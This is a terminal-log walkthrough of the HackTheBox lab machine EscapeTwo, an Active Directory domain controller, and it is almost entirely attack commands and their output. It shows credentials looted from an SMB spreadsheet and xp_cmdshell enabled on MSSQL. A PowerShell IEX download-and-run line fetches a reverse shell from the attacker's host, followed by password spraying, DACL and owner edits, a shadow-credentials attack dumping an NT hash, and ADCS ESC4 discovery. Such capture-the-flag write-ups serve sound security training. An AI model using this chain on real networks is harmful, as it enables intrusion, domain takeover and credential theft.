EscapeTwo
AD box on HTB.
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.148.204
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-17 17:20 +03
Nmap scan report for 10.129.148.204
Host is up, received echo-reply ttl 127 (0.14s latency).
Scanned at 2025-09-17 16:58:26 +03 for 304s
Not shown: 65509 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-17 13:59:09Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-17T14:02:19+00:00; -2s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-26T11:46:45
| Not valid after: 2124-06-08T17:00:40
| MD5: b55a:a63f:50ba:ed44:f865:820a:5b8e:f493
| SHA-1: a87b:9555:5164:74d3:f73f:bded:72e7:baab:db76:c12a
| -----BEGIN CERTIFICATE-----
| MIIF6TCCBNGgAwIBAgITVAAAAAVjf8S2XKAtZAAAAAAABTANBgkqhkiG9w0BAQsF
<snipped>
|_-----END CERTIFICATE-----
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-17T14:02:08+00:00; -8s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-26T11:46:45
| Not valid after: 2124-06-08T17:00:40
| MD5: b55a:a63f:50ba:ed44:f865:820a:5b8e:f493
| SHA-1: a87b:9555:5164:74d3:f73f:bded:72e7:baab:db76:c12a
| -----BEGIN CERTIFICATE-----
| MIIF6TCCBNGgAwIBAgITVAAAAAVjf8S2XKAtZAAAAAAABTANBgkqhkiG9w0BAQsF
<snipped>
|_-----END CERTIFICATE-----
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.148.204:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.148.204:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-17T13:41:41
| Not valid after: 2055-09-17T13:41:41
| MD5: 6531:d86b:a6ee:d467:2cc3:f2ef:3827:2b2a
| SHA-1: fc90:60ee:e67a:b699:573d:6d55:fe33:ef11:40b8:2efe
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQM4hsTX3ToK9PBR9PG+qujzANBgkqhkiG9w0BAQsFADA7
<snipped>
|_-----END CERTIFICATE-----
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-17T14:02:08+00:00; -3s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-26T11:46:45
| Not valid after: 2124-06-08T17:00:40
| MD5: b55a:a63f:50ba:ed44:f865:820a:5b8e:f493
| SHA-1: a87b:9555:5164:74d3:f73f:bded:72e7:baab:db76:c12a
| -----BEGIN CERTIFICATE-----
| MIIF6TCCBNGgAwIBAgITVAAAAAVjf8S2XKAtZAAAAAAABTANBgkqhkiG9w0BAQsF
|_-----END CERTIFICATE-----
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-17T14:01:09+00:00; -56s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-26T11:46:45
| Not valid after: 2124-06-08T17:00:40
| MD5: b55a:a63f:50ba:ed44:f865:820a:5b8e:f493
| SHA-1: a87b:9555:5164:74d3:f73f:bded:72e7:baab:db76:c12a
| -----BEGIN CERTIFICATE-----
| MIIF6TCCBNGgAwIBAgITVAAAAAVjf8S2XKAtZAAAAAAABTANBgkqhkiG9w0BAQsF
|_-----END CERTIFICATE-----
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49686/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49688/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49693/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49702/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49721/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49731/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
63859/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ netexec smb 10.129.148.204
SMB 10.129.148.204 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.148.204 DC01.sequel.htb sequel.htb DC01┌──(kali㉿kali)-[~/…/Machines/HackTheBox/EscapeTwo/bloodhound]
└─$ bloodhound-python -u rose -p KxEPkKe6R8su -ns 10.129.148.204 -d sequel.htb -dc dc01.sequel.htb -c all
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: sequel.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 10 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.sequel.htb
INFO: Done in 00M 48S
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/EscapeTwo/bloodhound]
└─$ rusthound-ce -u rose -p KxEPkKe6R8su -d sequel.htb -f dc01.sequel.htb -i 10.129.148.204 -n 10.129.148.204
---------------------------------------------------
Initializing RustHound-CE at 17:22:34 on 09/17/25
Powered by @g0h4n_0
---------------------------------------------------
[2025-09-17T14:22:34Z INFO rusthound_ce] Verbosity level: Info
[2025-09-17T14:22:34Z INFO rusthound_ce] Collection method: All [2025-09-17T14:22:34Z INFO rusthound_ce::ldap] Connected to SEQUEL.HTB Active Directory!
[2025-09-17T14:22:34Z INFO rusthound_ce::ldap] Starting data collection...
[2025-09-17T14:22:34Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-17T14:22:36Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=sequel,DC=htb
[2025-09-17T14:22:36Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-17T14:22:39Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=sequel,DC=htb
[2025-09-17T14:22:39Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-17T14:22:41Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=sequel,DC=htb
[2025-09-17T14:22:41Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-17T14:22:41Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=sequel,DC=htb
[2025-09-17T14:22:41Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-17T14:22:42Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=sequel,DC=htb
[2025-09-17T14:22:42Z INFO rusthound_ce::api] Starting the LDAP objects parsing...
[2025-09-17T14:22:42Z INFO rusthound_ce::objects::domain] MachineAccountQuota: 10
<snipped>
[2025-09-17T14:22:42Z INFO rusthound_ce::json::maker::common] .//20250917172242_sequel-htb_issuancepolicies.json created!
RustHound-CE Enumeration Completed at 17:22:42 on 09/17/25! Happy Graphing!
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/EscapeTwo/bloodhound] 17:24:57 [5/99]
└─$ sudo bloodhound
[sudo] password for kali:
Starting neo4j
<snipped>
...............................................................
Bloodhound will start
IMPORTANT: It will take time, please wait...
<snipped>
opening http://127.0.0.1:8080┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ nxc smb dc01.sequel.htb -u rose -p KxEPkKe6R8su --shares
SMB 10.129.148.204 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.148.204 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SMB 10.129.148.204 445 DC01 [*] Enumerated shares
SMB 10.129.148.204 445 DC01 Share Permissions Remark
SMB 10.129.148.204 445 DC01 ----- ----------- ------
SMB 10.129.148.204 445 DC01 Accounting Department READ
SMB 10.129.148.204 445 DC01 ADMIN$ Remote Admin
SMB 10.129.148.204 445 DC01 C$ Default share
SMB 10.129.148.204 445 DC01 IPC$ READ Remote IPC
SMB 10.129.148.204 445 DC01 NETLOGON READ Logon server share
SMB 10.129.148.204 445 DC01 SYSVOL READ Logon server share
SMB 10.129.148.204 445 DC01 Users READ┌──(kali㉿kali)-[~/…/Machines/HackTheBox/EscapeTwo/smb]
└─$ impacket-smbclient sequel.htb/rose:KxEPkKe6R8su@10.129.148.204
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# shares
Accounting Department
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
Users
# use users
# ls
drw-rw-rw- 0 Sun Jun 9 16:42:11 2024 .
drw-rw-rw- 0 Sun Jun 9 16:42:11 2024 ..
drw-rw-rw- 0 Sun Jun 9 14:17:29 2024 Default
-rw-rw-rw- 174 Sun Jun 9 05:27:10 2024 desktop.ini
# use accounting department
# ls
drw-rw-rw- 0 Sun Jun 9 14:11:31 2024 .
drw-rw-rw- 0 Sun Jun 9 14:11:31 2024 ..
-rw-rw-rw- 10217 Sun Jun 9 14:11:31 2024 accounting_2024.xlsx
-rw-rw-rw- 6780 Sun Jun 9 14:11:31 2024 accounts.xlsx
# mget *
[*] Downloading accounting_2024.xlsx
[*] Downloading accounts.xlsx
# exit┌──(kali㉿kali)-[~/…/Machines/HackTheBox/EscapeTwo/smb]
└─$ libreoffice accounts.xlsx
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/EscapeTwo/smb]
└─$ exiftool account*
======== accounting_2024.xlsx
ExifTool Version Number : 13.25
File Name : accounting_2024.xlsx
Directory : .
File Size : 10 kB
File Modification Date/Time : 2025:09:17 17:24:15+03:00
File Access Date/Time : 2025:09:17 17:25:26+03:00
File Inode Change Date/Time : 2025:09:17 17:24:15+03:00
File Permissions : -rw-rw-r--
Error : File format error
======== accounts.xlsx
ExifTool Version Number : 13.25
File Name : accounts.xlsx
Directory : .
File Size : 6.8 kB
File Modification Date/Time : 2025:09:17 17:24:16+03:00
File Access Date/Time : 2025:09:17 17:25:17+03:00
File Inode Change Date/Time : 2025:09:17 17:24:16+03:00
File Permissions : -rw-rw-r--
Error : File format error
2 image files read┌──(kali㉿kali)-[~/…/HackTheBox/EscapeTwo/smb/accounts]
└─$ unzip ../accounts.xlsx
Archive: ../accounts.xlsx
file #1: bad zipfile offset (local header sig): 0
inflating: xl/workbook.xml
inflating: xl/theme/theme1.xml
inflating: xl/styles.xml
inflating: xl/worksheets/_rels/sheet1.xml.rels
inflating: xl/worksheets/sheet1.xml
inflating: xl/sharedStrings.xml
inflating: _rels/.rels
inflating: docProps/core.xml
inflating: docProps/app.xml
inflating: docProps/custom.xml
inflating: [Content_Types].xml
┌──(kali㉿kali)-[~/…/HackTheBox/EscapeTwo/smb/accounts]
└─$ ls
'[Content_Types].xml' docProps _rels xl
┌──(kali㉿kali)-[~/…/HackTheBox/EscapeTwo/smb/accounts]
└─$ tree
.
├── [Content_Types].xml
├── docProps
│ ├── app.xml
│ ├── core.xml
│ └── custom.xml
├── _rels
└── xl
├── sharedStrings.xml
├── styles.xml
├── theme
│ └── theme1.xml
├── workbook.xml
└── worksheets
├── _rels
│ └── sheet1.xml.rels
└── sheet1.xml
7 directories, 10 files
┌──(kali㉿kali)-[~/…/HackTheBox/EscapeTwo/smb/accounts]
└─$ cd xl
┌──(kali㉿kali)-[~/…/EscapeTwo/smb/accounts/xl]
└─$ ls
sharedStrings.xml styles.xml theme workbook.xml worksheets
┌──(kali㉿kali)-[~/…/EscapeTwo/smb/accounts/xl]
└─$ cat sharedStrings.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="25" uniqueCount="24"><si><t xml:space="preserve">First Name</t></si><si><t xml:space="preserve
">Last Name</t></si><si><t xml:space="preserve">Email</t></si><si><t xml:space="preserve">Username</t></si><si><t xml:space="preserve">Password</t></si><si><t xml:space="pr
eserve">Angela</t></si><si><t xml:space="preserve">Martin</t></si><si><t xml:space="preserve">angela@sequel.htb</t></si><si><t xml:space="preserve">angela</t></si><si><t xm
l:space="preserve">0fwz7Q4mSpurIt99</t></si><si><t xml:space="preserve">Oscar</t></si><si><t xml:space="preserve">Martinez</t></si><si><t xml:space="preserve">oscar@sequel.
htb</t></si><si><t xml:space="preserve">oscar</t></si><si><t xml:space="preserve">86LxLBMgEWaKUnBG</t></si><si><t xml:space="preserve">Kevin</t></si><si><t xml:space="prese
rve">Malone</t></si><si><t xml:space="preserve">kevin@sequel.htb</t></si><si><t xml:space="preserve">kevin</t></si><si><t xml:space="preserve">Md9Wlq1E5bZnVDVo</t></si><si>
<t xml:space="preserve">NULL</t></si><si><t xml:space="preserve">sa@sequel.htb</t></si><si><t xml:space="preserve">sa</t></si><si><t xml:space="preserve">MSSQLP@ssw0rd!</t>
</si></sst>┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ nxc mssql dc01.sequel.htb -u sa -p 'MSSQLP@ssw0rd!' --local-auth
MSSQL 10.129.148.204 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
MSSQL 10.129.148.204 1433 DC01 [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ impacket-mssqlclient seque.htb/sa:'MSSQLP@ssw0rd!'@10.129.148.204
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (sa dbo@master)>SQL (sa dbo@master)> select name from master..sysdatabases;
name
------
master
tempdb
model
msdbSQL (sa dbo@master)> enable_xp_cmdshell
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> xp_cmdshell whoami
output
--------------
sequel\sql_svc
NULLSQL (sa dbo@master)> xp_cmdshell "powershell -c IEX(IWR -UseBasicParsing -Uri http://10.10.16.2/shell.ps1)"┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.148.204 - - [17/Sep/2025 18:08:41] "GET /shell.ps1 HTTP/1.1" 200 -┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.16.2] from (UNKNOWN) [10.129.148.204] 54514
PS C:\Windows\system32>PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/5/2022 12:03 PM PerfLogs
d-r--- 1/4/2025 7:11 AM Program Files
d----- 6/9/2024 8:37 AM Program Files (x86)
d----- 6/8/2024 3:07 PM SQL2019
d-r--- 6/9/2024 6:42 AM Users
d----- 1/4/2025 8:10 AM Windows
PS C:\> cd SQL2019
PS C:\SQL2019> ls
Directory: C:\SQL2019
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/3/2025 7:29 AM ExpressAdv_ENU
PS C:\SQL2019> cd ExpressAdv_ENU
PS C:\SQL2019\ExpressAdv_ENU> ls
Directory: C:\SQL2019\ExpressAdv_ENU
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/8/2024 3:07 PM 1033_ENU_LP
d----- 6/8/2024 3:07 PM redist
d----- 6/8/2024 3:07 PM resources
d----- 6/8/2024 3:07 PM x64
-a---- 9/24/2019 10:03 PM 45 AUTORUN.INF
-a---- 9/24/2019 10:03 PM 788 MEDIAINFO.XML
-a---- 6/8/2024 3:07 PM 16 PackageId.dat
-a---- 9/24/2019 10:03 PM 142944 SETUP.EXE
-a---- 9/24/2019 10:03 PM 486 SETUP.EXE.CONFIG
-a---- 6/8/2024 3:07 PM 717 sql-Configuration.INI
-a---- 9/24/2019 10:03 PM 249448 SQLSETUPBOOTSTRAPPER.DLL
PS C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ nxc smb dc01.sequel.htb -u users.txt -p 'WqSZAF6CysDQbGb3' --continue-on-success
SMB 10.129.148.204 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.148.204 445 DC01 [-] sequel.htb\Administrator:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.129.148.204 445 DC01 [-] sequel.htb\Guest:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.129.148.204 445 DC01 [-] sequel.htb\krbtgt:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.129.148.204 445 DC01 [-] sequel.htb\michael:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.129.148.204 445 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3
SMB 10.129.148.204 445 DC01 [-] sequel.htb\oscar:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.129.148.204 445 DC01 [+] sequel.htb\sql_svc:WqSZAF6CysDQbGb3
SMB 10.129.148.204 445 DC01 [-] sequel.htb\rose:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.129.148.204 445 DC01 [-] sequel.htb\ca_svc:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.129.148.204 445 DC01 [-] sequel.htb\sa:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ impacket-owneredit -action write -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3 -dc-ip 10.129.148.204 -new-owner ryan
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-548670397-972687484-3496335370-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=sequel,DC=htb
[*] OwnerSid modified successfully!┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ impacket-dacledit -action write -rights FullControl -principal ryan -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250917-190702.bak
[*] DACL modified successfully!┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ certipy-ad shadow auto -u ryan@seque.htb -p WqSZAF6CysDQbGb3 -dc-ip 10.129.148.204 -ns 10.129.148.204 -target dc01.sequel.htb -account ca_svc
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '8254041a-2302-127c-a5df-0878d7288a11'
[*] Adding Key Credential with device ID '8254041a-2302-127c-a5df-0878d7288a11' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '8254041a-2302-127c-a5df-0878d7288a11' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ca_svc@sequel.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[-] Could not update Key Credentials for 'ca_svc' due to insufficient access rights: 00002098: SecErr: DSID-031514A0, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0
[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fce┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ nxc ldap dc01.sequel.htb -u ca_svc -H 3b181b914e7a9d5508ea1e20bc2b7fce -M adcs
LDAP 10.129.148.204 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
LDAP 10.129.148.204 389 DC01 [+] sequel.htb\ca_svc:3b181b914e7a9d5508ea1e20bc2b7fce
ADCS 10.129.148.204 389 DC01 [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.129.148.204 389 DC01 Found PKI Enrollment Server: DC01.sequel.htb
ADCS 10.129.148.204 389 DC01 Found CN: sequel-DC01-CA┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ certipy-ad find -u ca_svc -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -dc-ip 10.129.148.204 -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'sequel-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'sequel-DC01-CA'
[*] Checking web enrollment for CA 'sequel-DC01-CA' @ 'DC01.sequel.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20250917191928_Certipy.txt'
[*] Wrote text output to '20250917191928_Certipy.txt'
[*] Saving JSON output to '20250917191928_Certipy.json'
[*] Wrote JSON output to '20250917191928_Certipy.json'┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ cat 20250917191928_Certipy.txt
Certificate Authorities
0
CA Name : sequel-DC01-CA
DNS Name : DC01.sequel.htb
Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb
Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3
Certificate Validity Start : 2024-06-08 16:50:40+00:00
Certificate Validity End : 2124-06-08 17:00:40+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireDns
SubjectRequireCommonName
Enrollment Flag : PublishToDs
AutoEnrollment
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2025-09-17T16:17:27+00:00
Template Last Modified : 2025-09-17T16:17:27+00:00
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Enterprise Admins
Full Control Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Cert Publishers
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Cert Publishers
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Cert Publishers
Write Property Enroll : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
[+] User Enrollable Principals : SEQUEL.HTB\Cert Publishers
[+] User ACL Principals : SEQUEL.HTB\Cert Publishers
[!] Vulnerabilities
ESC4 : User has dangerous permissions.┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
